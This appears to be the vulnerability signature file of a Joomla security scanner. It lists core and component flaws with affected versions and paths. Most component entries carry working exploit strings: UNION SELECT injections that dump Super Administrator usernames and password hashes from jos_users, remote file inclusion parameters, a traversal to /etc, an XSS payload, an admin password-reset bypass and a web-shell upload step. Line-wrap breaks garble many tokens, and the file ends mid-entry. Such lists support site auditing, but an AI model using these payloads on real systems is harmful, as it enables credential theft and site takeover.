Generic: htaccess.txt has not been renamed. Versions Affected: Any|/htaccess.txt|Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Generic: Unprotected Administrator directory Versions Affected: Any|/administrator/|The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Generic: Guessable Administrator directory Versions Affected: Any|/admin/|The guessable /admin directory is detected. Attackers can bruteforce administrator accounts. How to protect: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Core: Multiple XSS/CSRF Vulnerability Versions Affected: 1.5.9 <= |/?1.5.9-x|A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1.5.8 <= |/?1.5.8-x|When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <=|/?1.5.10-x|Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.11 <=|/libraries/phpxmlrpc/xmlrpcs.php|/libraries/phpxmlrpc/xmlrpcs.php
Core: Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions effected: 1.5.11 <=|/?1.5.11-x-http_ref|An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effected: 1.5.11 <=|/?1.5.11-x-php-s3lf|An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Core: Authentication Bypass Vulnerability Versions effected: Joomla! 1.5.3 <=|/administrator/|Backend accepts any password for custom Super Administrator when LDAP enabled
Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.3 <=|/?1.5.3-path-disclose|Crafted URL can disclose absolute path
Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <=|/?1.5.3-spam|User redirect spam
Core: joomla.php RFI Vulnerability Versions effected: 1.0.0 |/includes/joomla.php|/includes/joomla.php?includepath=
Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <=|/administrator/|It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Core: Admin Backend Session Fixation SQL Injection Vulnerability Versions effected: Joomla! 1.0.12 <=|/?j1012-fixate-session|It is possible to manipulate administrator interface cookies, which may be used to impersonate a legitimate user, allowing the attacker to view or alter user records, and to perform transactions as that user. The Cookie variable can be set to a malicious and arbitrary value which can lead to session hijacking and privilege escalation attack.
Core: Path Disclosure Vulnerability Versions effected: Joomla! 1.5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability Versions effected: Joomla! 1.5.8 <=|/plugins/editors/xstandard/attachmentlibrary.php|Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/e

ditors/xstandard/attachmentlibrary.php CoreLibrary: g_pcltar_lib_dir Remote File Inclusion Vulnerability Versions effec ted: Joomla! 1.5.0 Beta|/libraries/pcl/pcltar.php|/libraries/pcl/pcltar.php?g_pc ltar_lib_dir= CoreTemplate: ja_purity XSS Vulnerability Versions effected: 1.5.10 <=|/templat es/ja_purity/|A XSS vulnerability exists in the JA_Purity template which ships w ith Joomla! 1.5. CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Jo omla! 1.5.0 Beta/Stable|/libraries/phpmailer/phpmailer.php|N/A CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected : Joomla! 1.5.12 |/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser /|While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296 CoreComponent: Joomla Remote Admin Password Change Vulnerability Versions Affe cted: 1.5.5 <= |/components/com_user/controller.php|1. Go to url : target.com/in dex.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" c har ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/ administrator/ 5. Login admin with new password CoreComponent: com_content SQL Injection Vulnerability Version Affected: Joo mla! 1.0.0 <= |/components/com_content/|/index.php?option=com_content&task=blog category&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x 1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-CoreComponent: com_search Remote Code Execution Vulnerability Version Affected : Joomla! 
1.5.0 beta 2 <= |/components/com_search/|/index.php?option=com_search &Itemid=1&searchword=%22%3Becho%20md5(911)%3B CoreComponent: com_admin File Inclusion Vulnerability Versions Affected: N/A|/components/com_admin/admin.admin.html.php|/components/com_admin/admin.admin .html.php?mosConfig_absolute_path= CoreComponent: com_admin File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_admin/admin.admin.html.php|/administrator/comp onents/com_admin/admin.admin.html.php?mosConfig_absolute_path= CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A|/compon ents/com_mailto/|/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2 +union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0 x53757065722041646d696e6973747261746f72--&Itemid=1 CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3|/components/com_content/|/index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28 CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5. 7 <= |/components/com_content/|The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. CoreComponent: com_weblinks XSS Vulnerability Version Affected: Joomla! 1. 5.7 <= |/components/com_weblinks/|[Requires valid user account] com_weblinks a llows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). CoreComponent: com_mailto Email Spam Vulnerability Version Affected: Joomla! 1.5.6 <= |/components/com_mailto/|The mailto component does not verify validit y of the URL prior to sending. CoreComponent: com_content view=archive SQL Injection Vulnerability Versions e ffected: Joomla! 
1.5.0 Beta1/Beta2/RC1|/components/com_content/|Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <=| /components/com_content/|A XSS vulnerability exists in the category view of com_ content. CoreComponent: com_users XSS Vulnerability Version Affected: Joomla! 1.5.10 <=|/ components/com_users/|A XSS vulnerability exists in the user view of com_users i n the administrator panel.

CoreComponent: com_installer CSRF Vulnerability Versions effected: Joomla! 1.5. 0 Beta|/administrator/components/com_installer|N/A CoreComponent: com_search Memory Comsumption DoS Vulnerability Versions effecte d: Joomla! 1.5.0 Beta|/components/com_search/|N/A CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability Versions effected: 1.0.7 <=|/components/com_poll/|Send request /index.php?option=com_po ll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><> CoreComponent: com_banners Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_banners/|/index.php?option=com_banners&task=archivesection& id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1 '='2 CoreComponent: com_mailto timeout Vulnerability Versions effected: 1.5.13 <=|/c omponents/com_mailto/|[Requires a valid user account] In com_mailto, it was poss ible to bypass timeout protection against sending automated emails. Component: A6MamboCredits File Inclusion Vulnerability Versions Affected: Any |/components/com_a6mambocredits/|/components/com_a6mambocredits/admin.a6mambocre dits.php?mosConfig_absolute_path= Component: A6MamboHelpDesk File Inclusion Vulnerability Versions Affected: An y |/components/com_a6mambohelpdesk/|/components/com_a6mambohelpdesk/admin.a6mamb ohelpdesk.php?mosConfig_live_site= Component: Advanced Poll Versions Affected: 2.2.0 <= |/components/com_a dvancedpoll/|N/A Component: Akocomment SQL Injection Vulnerability Versions Affected: Any |/com ponents/com_akocomment/|Akocomment allows users to post comments to articles. $a cname and $contentid are not sanitized and vulnerable. These correspond to hidde n, value-prefilled FORM variables in the akocomment created html form. 
Component: Article File Inclusion Vulnerability Versions Affected: 1.1 < = |/components/com_articles/|/classes/html/com_articles.php?absolute_path= Component: ArtLinks File Inclusion Vulnerability Versions Affected: Any|/comp onents/com_artlinks/|/components/com_artlinks/artlinks.dispnew.php?mosConfig_abs olute_path= Component: MamCom (com_trade) Versions Affected: Any |/components/com_trade/| N/A Component: Bayesian Naive Filter File Inclusion Vulnerability Versions A ffected: 1.1 <= |/components/com_bayesiannaivefilter/|/components/com_bayesianna ivefilter/lang.php?mosConfig_absolute_path= Component: BigApe Backup File Inclusion Vulnerability Versions Affected: <= |/components/com_babackup/|/components/com_babackup/classes/Tar.php?mosConfig_a bsolute_path= Component: BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions Affect ed: 2.2.1 <= |/components/com_bsqsitestats/|1) Input passed via the "HTTP Refere r" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative us er's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised before be ing used in SQL queries. This can be exploited to manipulate SQL queries by inje cting arbitrary SQL code. Successful exploitation requires that "magic_quotes_g pc" is disabled. 
Component: Car Manager SQL Injection Vulnerability Versions Affected: 1.1 <= |/components/com_resman/|/index.php?option=com_resman&task=moreinfo&id=-1+UNION +SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Classifieds Versions Affected: 1.3 <= |/components/com_classifieds/| N/A Component: Colophon File Inclusion Vulnerability Versions Affected: 1.2 <= | /components/com_colophon/|/components/com_colophon/admin.colophon.php?mosConfig_ absolute_path= Component: Community Builder SQL Injection Vulnerability Versions Affected: 1. 0.0 <= |/components/com_profiler/|/index.php?option=com_profile&Itemid=42&task=& task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,

0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e697374 7261746f72-Component: Events Versions Affected: 1.3 Beta <= |/components/com_events /|N/A Component: Expose Flash Gallery Remote Permission Bypass/Arbitrary File Upload Vulnerability Versions Affected: RC4 <= |/components/com_expose/uploadimg.php|Up load shell.php.jpg to /components/com_expose/uploadimg.php or /administrator/com _expose/uploadimg.php. Check your shell at /components/com_expose/expose/img/she ll.php.jpg or /administrator/... Component: ExtCalendar XSS Vulnerability Versions Affected: 0.9.1 <= |/co mponents/com_extcalendar/|1) Input passed to the "month", "year", "prev", and "n ext" parameters in calendar.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "Event title" field when adding a new event isn't properly sanitised before bei ng used. This can be exploited to inject arbitrary HTML and script code, which w ill be executed in a user's browser session in context of an affected site when the malicious user data is viewed (e.g. when the administrator logs in). 
Component: Facile Forms SQL Injection Vulnerability Versions Affected: 1.4.6 <= |/components/com_facileforms/|/index.php?option=com_facileforms&Itemid=640&user _id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a ,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: Galleria File Inclusion Vulnerability Versions Affected: Any |/ components/com_galleria/galleria.html.php|/components/com_galleria/galleria.html .php?mosConfig_absolute_path= Component: Gmaps SQL Injection Vulnerability Versions Affected: 1.01 <= |/ components/com_gmaps/|/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3 ,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f7 2-Component: Hash Cash File Inclusion Vulnerability Versions Affected: Any |/co mponents/com_hashcash/server.php|/components/com_hashcash/server.php?mosConfig_a bsolute_path= Component: Hot Property Versions Affected: 0.97 <= |/components/com_hotproper ty/|N/A Component: JCE XSS+File Inclusion Vulnerability Versions Affected: 1.0.4 <= |/components/com_jce/|1) Input passed to the "img", "title", "w", and "h" par ameters within jce.php is not properly sanitised before being returned to the us er. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local r esources. 
Component: JoomlaPack File Inclusion Vulnerability Versions Affected: 1.0.4a2 RE <= |/components/com_jpack/|/components/com_jpack/includes/CAltInstall er.php?mosConfig_absolute_path= Component: JoomlaBoard File Inclusion Vulnerability Versions Affecte d: 1.1.1 <= |/components/com_joomlaboard/|/components/com_joomlaboard/file_uploa d.php?sbp= Component: JoomlaLib Versions Affected: 1.2.1 <= |/components/com_joomlalib/| N/A Component: JD-WordPress Versions Affected: 1.0 RC2 <= |/components/com_j d-wp/|N/A Component: Fundraiser Versions Affected: 0.0.0 <= |/components/com_fundraiser/ |N/A Component: Marketplace SQL Injection Vulnerability Versions Affected: 1.1.1 -pl1 <= |/components/com_marketplace/|/index.php?option=com_marketplace&page=sho w_category&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,us ertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726

1746f72-Component: NeoReferences SQL Injection Vulnerability Versions Affected : 1.3.1 <= |/components/com_neoreferences/|/index.php?option=com_neoreferences&I temid=27&catid=99887766+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3 a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726 1746f72+where+user_id=1=1-Component: CHRONOContact File Inclusion Vulnerability Versions Affected: N/A|/co mponents/com_chronocontact/excelwriter/PPS/File.php|/components/com_chronocontac t/excelwriter/PPS/File.php?mosConfig_absolute_path= Component: MamboSPGM Versions Affected: 1.4.1 <= |/components/com_mambospgm/| N/A Component: Ajax Chat Versions Affected: 1.0.1 <= |/components/com_ajaxchat/|N /A Component: Joomla Cloner Versions Affected: 1.6.1 <= |/components/com_cloner/| N/A Component: Quiz SQL Injection Vulnerability Versions Affected: 0.81 <= |/com ponents/com_quiz/|/index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1+U NION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: MCQuiz SQL Injection Vulnerability Versions Affected: 0.9 < = |/components/com_mcquiz/|/index.php?option=com_mcquiz&task=user_tst_shw&Itemid =42&tid=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e),0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72 -Component: paxxgallery Blind SQL Injection Vulnerability Versions Affected: 0.2 <= |/components/com_paxxgallery/|/index.php?option=com_paxxgallery&Itemid=85 &gid=7&userid=1&task=view&iid=1+and+1=1::/index.php?option=com_paxxgallery&Itemi d=85&gid=7&userid=1&task=view&iid=1+and+1=2 Component: pcchess File Inclusion Vulnerability Versions Affected: 0.8 < = |/components/com_pcchess/include.pcchess.php|/components/com_pcchess/include.p cchess.php?mosConfig_absolute_path= Component: xfaq SQL Injection Vulnerability Versions Affected: 1.2 <= |/ 
components/com_xfaq/|/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&a id=-9988+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e ),1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0+FROM+jos_users+where+usertype=0x53757065 722041646d696e6973747261746f72-Component: rapidrecipe SQL injection Vulnerability Versions Affected: 1.6.5 <= |/components/com_rapidrecipe/|/index.php?option=com_rapidrecipe&page=viewrec ipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos _users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_doc SQL Injection Vulnerability Versions Affected: Any ]|/compon ents/com_doc/|/index.php?option=com_doc&task=view&sid=-1+UNION+SELECT+1,1,2,conc at(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,5,6,7,8,password,us ername,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72 -Component: Unknown name: com_noticias SQL Injection Vulnerability Versions Affected: Any |/components/com_noticias/|index.php?option=com_noticias&Itemid=x corpitx&task=detalhe&id=-99887766+UNION++SELECT+0,concat(username,0x3a,password, 0x3a,email),2,3,4,5++FROM++jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: NeoGallery SQL Injection Vulnerability Versions Affected: Any | /components/com_neogallery/|/index.php?option=com_neogallery&task=show&Itemid=5& catid=999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72 -Component: Ynews SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_ynews/|/index.php?option=com_ynews&Itemid=0&task=showYNews& id=-1+UNION+SELECT+0,1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype ,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f7

2-Component: jooget SQL Injection Vulnerability Versions Affected: 2.6.8 <= |/components/com_jooget/|/index.php?option=com_jooget&Itemid=61&task=detail& id=-1+UNION+SELECT+0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2, 2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+whe re+usertype=0x53757065722041646d696e6973747261746f72-Component: MediaSlide Blind SQL Injection Vulnerability Versions Affected: 0.5.0 <= |/components/com_mediaslide/|/index.php?option=com_mediaslide&act=contact&id =1&albumnum=1+and+1=1::/index.php?option=com_mediaslide&act=contact&id=1&albumnu m=1+and+1=2 Component: Rssxt RFI Vulnerability Versions Affected: 1.0 <= |/components/com_r ssxt/|/components/com_rssxt/rssxt.php?mosConfig_absolute_path= Component: D4JeZine Versions Affected: 2.8 <= |/components/com_ezine/|N/A Component: ProductShowcase SQL Injection Vulnerability Versions Affected: 1.5 <= |/components/com_productshowcase/|/index.php?option=com_productshowcase&Itemid= 1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1 e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e ),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d69 6e6973747261746f72-Component: Candle SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_candle/|/index.php?option=com_candle&task=content&cID=-9999+UN ION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6 +FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: simple shop SQL Injection Vulnerability Versions Affected: 2.0 <= |/ components/com_simpleshop/|/index.php?option=com_simpleshop&task=browse&Itemid=2 9&catid=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e),1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472 61746f72-Component: hwdVideoShare SQL Injection Vulnerability Versions Affected: 1.1.1 <= 
|/components/com_hwdvideoshare/|/index.php?option=com_hwdvideoshare&func=viewca tegory&Itemid=61&cat_id=-9999999+UNION+SELECT+000,111,222,333,concat(0x1e,userna me,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FR OM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Clasifier SQL Injection Vulnerability Versions Affected: 0.9 <= |/co mponents/com_clasifier/|/index.php?option=com_clasifier&Itemid=61&cat_id=-999999 9+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+ jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: PC CookBook SQL Injection Vulnerability Versions Affected: 1.3 < = |/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewuserrec ipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a, usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472617 46f72-Component: astatsPRO SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_astatspro/|/components/com_astatspro/refer.php?id=-1+UNION+ SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+wher e+usertype=0x53757065722041646d696e6973747261746f72-Component: com_galeria SQL Injection Vulnerability Versions Affected: Any|/ components/com_galeria/|/index.php?option=com_galeria&Itemid=61&func=detail&id=999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x 1e),111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,7+FROM+jos_users+where+usertyp e=0x53757065722041646d696e6973747261746f72-Component: Limbo File Manager com_fm RFI Vulnerability Versions Affected: 1.0.4 <= |/components/com_fm/fm.install.php|/components/com_fm/fm.install.php?lm_abso lute_path= Component: Serverstat File Inclusion Vulnerability Versions Affected: 0.4. 
4 <= |/components/com_serverstat/install.serverstat.php|/components/com_serverst at/install.serverstat.php?mosConfig_absolute_path= Component: Com Profiler Blind SQL Injection Vulnerability Versions Affected: 1.0 RC2 <=|/components/com_comprofiler/|/index.php?option=com_comprofiler&task= userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&u

ser=1+and+1=2 Component: Crop Image File Inclusion Vulnerability Versions Affected: 1.0 < = |/components/com_cropimage/admin.cropcanvas.php|/components/com_cropimage/admi n.cropcanvas.php?cropimagedir= Component: Mambatstaff File Inclusion Vulnerability Versions Affected: 3.1b <= |/components/com_mambatstaff/mambatstaff.php|/components/com_mambatstaff/mam batstaff.php?mosConfig_absolute_path= Component: Loudmouth Versions Affected: 4.0 j <= |/components/com_loudmouth/| N/A Component: PhpBB RFI Vulnerability Versions Affected: 1.2.4RC3 <= |/components/c om_forum/|/components/com_forum/download.php?phpbb_root_path= Component: Kochsuite File Inclusion Vulnerability Versions Affecte d: 0.9.4 <= |/components/com_kochsuite /|/components/com_kochsuite/config.kochsu ite.php?mosConfig_absolute_path= Component: Remository File Inclusion Vulnerability Versions Affecte d: 3.25 <= |/components/com_remository/admin.remository.php|/components/com_remo sitory/admin.remository.php?mosConfig_absolute_path= Component: Tosmo Mambo RFI Vulnerability Versions Affected: 4.0.13a <= |/compone nts/com_minibb/|/components/minibb/index.php?absolute_path= Component: Mam - Moodle File Inclusion Vulnerability Versions Affect ed: Any|/components/com_moodle/moodle.php|/components/com_moodle/moodle.php?mosC onfig_absolute_path= Component: Coppermine Photo Gallery File Inclusion Vulnerability Version s Affected: 1.0 <= |/components/com_cpg/cpg.php|/components/com_cpg/cpg.php?mosC onfig_absolute_path= Component: Php Shop File Inclusion Vulnerability Versions Affected: 1.2 RC2b <= |/components/com_phpshop/toolbar.phpshop.html.php|/components/com_phpsho p/toolbar.phpshop.html.php?mosConfig_absolute_path= Component: MamboWiki File Inclusion Vulnerability Versions Affected: 0.9.6 <= |/components/com_mambowiki/MamboLogin.php|/components/com_mambowiki/MamboLog in.php?IP= Component: Lurm Constructor File Inclusion Vulnerability Versions Affecte d: 0.6b <= 
|/components/com_lurm_constructor/admin.lurm_constructor.php|/compone nts/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= Component: FlippingBook SQL Injection Vulnerability Versions Affected: 1.0.4 <= |/components/com_flippingbook/|/index.php?option=com_flippingbook&Itemid=28&book _id=999+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+whe re+usertype=0x53757065722041646d696e6973747261746f72-Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/components/com_extplorer/|/index.php?com_extplorer-test1 Component: joomlaXplorer Local Directory Traversal Vulnerability Versions Affec ted: 1.6.2 <= |/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplore r&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc Component: joomlaXplorer XSS Vulnerability Versions Affected: 1.6.2 <= |/compone nts/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir =hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E Component: Online FlashQuiz Remote File Inclusion Vulnerability Versions Affec ted: 1.0.2 <= |/components/com_onlineflashquiz/|/component/com_onlineflashquiz/q uiz/common/db_config.inc.php?base_dir= Component: actualite SQL Injection Vulnerability Versions Affected: 1.0 <= |/components/com_actualite/|/index.php?option=com_actualite&task=edit&id=-1+UNIO N+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7 ,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: myalbum SQL Injection Vulnerability Versions Affected: 1.0 <= |/comp onents/com_myalbum/|/index.php?option=com_myalbum&album=-1+UNION+SELECT+0,concat (0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3,4+FROM+jos_users+where 
+usertype=0x53757065722041646d696e6973747261746f72-Component: alphacontent SQL Injection Vulnerability Versions Affected: 2.5.8

<= |/components/com_alphacontent/|/index.php?option=com_alphacontent&section=6& cat=15&task=view&id=-999999+UNION+SELECT+1,concat(username,0x3e,password),3,4,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,39+FROM+jos_us ers+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Cinema SQL Injection Vulnerability Versions Affected: 1.0 <= |/comp onents/com_cinema/|/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999+U NION+SELECT+0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,29,29,30,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FR OM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: D3000 SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_d3000/|/index.php?option=com_d3000&task=showarticles&id=-99999 +UNION+SELECT+0,username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: rekry SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_rekry/|/index.php?option=com_rekry&Itemid=60&rekryview=view&op_ id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+jos_users+where+usertype=0x537570657 22041646d696e6973747261746f72+limit+1,1-Component: custompages Remote File Inclusion Vulnerability Versions Affected: 1 .1 <= |/components/com_custompages/|/index.php?option=com_custompages&cpage= Component: Restaurante File Upload Vulnerability Versions Affected: 1.0 <= |/ components/com_restaurante/|/index.php?option=com_restaurante&task=detail&Itemid =1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2 ,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e ,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e69737 47261746f72-Component: Alberghi SQL Injection Vulnerability Versions Affected: 
2.1.3 <= |/c omponents/com_alberghi/|/index.php?option=com_alberghi&task=detail&Itemid=1&id=99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2, 2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(0x1e,username,0x3a,password,0x1e,0x3a ,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: joovideo SQL Injection Vulnerability Versions Affected: 1.2.2 < = |/components/com_joovideo/|/index.php?option=com_joovideo&Itemid=1&task=detail &id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,con cat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+us ertype=0x53757065722041646d696e6973747261746f72-Component: Acajoom SQL Injection Vulnerability Versions Affected: 1.1.5 <= |/c omponents/com_acajoom/|/index.php?option=com_acajoom&act=mailing&task=view&listi d=1&Itemid=1&mailingid=1+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password ,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+u sertype=0x53757065722041646d696e6973747261746f72+LIMIT+1,1-Component: jReviews RFI Vulnerability Versions Affected: Any |/components/com_jr eviews/scripts/xajax.inc.php|/components/com_jreviews/scripts/xajax.inc.php?mosC onfig_absolute_path= Component: BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions 